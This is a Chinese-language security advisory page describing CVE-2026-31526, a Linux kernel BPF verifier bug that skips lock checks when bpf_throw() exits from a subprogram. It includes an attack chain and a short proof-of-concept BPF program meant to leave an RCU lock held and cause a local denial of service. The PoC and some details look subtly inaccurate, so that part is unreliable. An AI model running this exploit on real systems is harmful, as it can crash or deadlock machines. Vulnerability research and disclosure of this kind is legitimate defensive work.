IPBUF安全漏洞报告
English
CVE-2026-31526 CVSS 5.5 中危

Linux Kernel BPF子程序异常退出锁检查漏洞

披露日期: 2026-04-22
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-31526
漏洞类型
资源管理错误
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelBPF资源管理错误拒绝服务本地漏洞

漏洞概述

Linux内核中的BPF子系统存在一个安全漏洞,该漏洞源于在处理子程序的异常退出时,锁检查机制的逻辑错误。具体而言,当通过bpf_throw()从静态子程序抛出异常时,process_bpf_exit_full()函数会跳过对RCU锁、抢占锁和中断ID的验证。由于bpf_throw()在运行时通过ORC展开堆栈而不释放用户获取的锁,这可能导致死锁或其他系统不稳定问题。该漏洞允许本地低权限攻击者利用此缺陷造成拒绝服务攻击,影响系统的可用性。

技术细节

该漏洞位于Linux内核的BPF验证器中,涉及异常处理时的资源清理逻辑。在BPF程序执行过程中,如果发生异常,系统会调用bpf_throw()进行堆栈展开。原本的代码逻辑中,process_bpf_exit_full()函数在调用check_resource_leak()时,传入的check_lock参数取决于当前帧(curframe)。当异常来自静态子程序时,该参数被设为false,导致验证器跳过了对active_rcu_locks、active_preempt_locks和active_irq_id的检查。实际上,异常退出时会绕过所有中间帧的清理操作,因此无论当前帧如何,都应强制检查锁的状态。如果不进行检查,当bpf_throw()通过ORC(Oops Recovery Capability)机制展开堆栈时,那些在子程序中获取但未释放的锁将保留在锁定状态。这种资源泄漏可能导致内核死锁、数据损坏或系统崩溃,从而被利用于本地拒绝服务攻击。值得注意的是,自旋锁不受此漏洞影响,因为它们在do_check_insn()的调用点已经被检查。

攻击链分析

STEP 1
步骤1
本地攻击者编写并加载一个包含BPF程序的恶意驱动或利用eBPF功能。
STEP 2
步骤2
BPF程序在主函数中获取资源锁(如RCU锁)。
STEP 3
步骤3
程序调用静态子程序,并在子程序中通过bpf_throw()故意触发异常。
STEP 4
步骤4
内核执行异常处理,利用ORC机制展开堆栈,但由于漏洞跳过了锁检查,未释放之前获取的锁。
STEP 5
步骤5
系统资源未被释放,导致内核死锁或系统崩溃,造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// SPDX-License-Identifier: GPL-2.0 #include <linux/bpf.h> #include <bpf/bpf_helpers.h> // This PoC demonstrates a BPF program that triggers the vulnerability // by calling bpf_throw() from a subprog while holding an RCU lock. SEC("socket") int main_prog(struct __sk_buff *skb) { // Acquire RCU lock in the main frame bpf_rcu_read_lock(); // Call a static subprogram that will throw an exception // In the vulnerable version, the lock check is skipped during unwind vulnerable_subprog(); // This unlock is never reached due to the exception bpf_rcu_read_unlock(); return 0; } static __noinline int vulnerable_subprog(void) { // Trigger exception exit from subprog // This bypasses normal frame cleanup, leaving RCU lock active bpf_throw(); return 0; } char _license[] SEC("license") = "GPL";

影响范围

Linux Kernel (versions prior to commit 5a399f3117642494e35545f6ca397d3e177c1f9b)
Linux Kernel (versions prior to commit 6c2128505f61b504c79a20b89596feba61388112)
Linux Kernel (versions prior to commit c0281da1f2aa5c2fca3a05f79b86bea96591c358)

防御指南

临时缓解措施
限制非特权用户加载BPF程序的能力(通过kernel.unprivileged_bpf_disabled sysctl设置),以减少本地攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表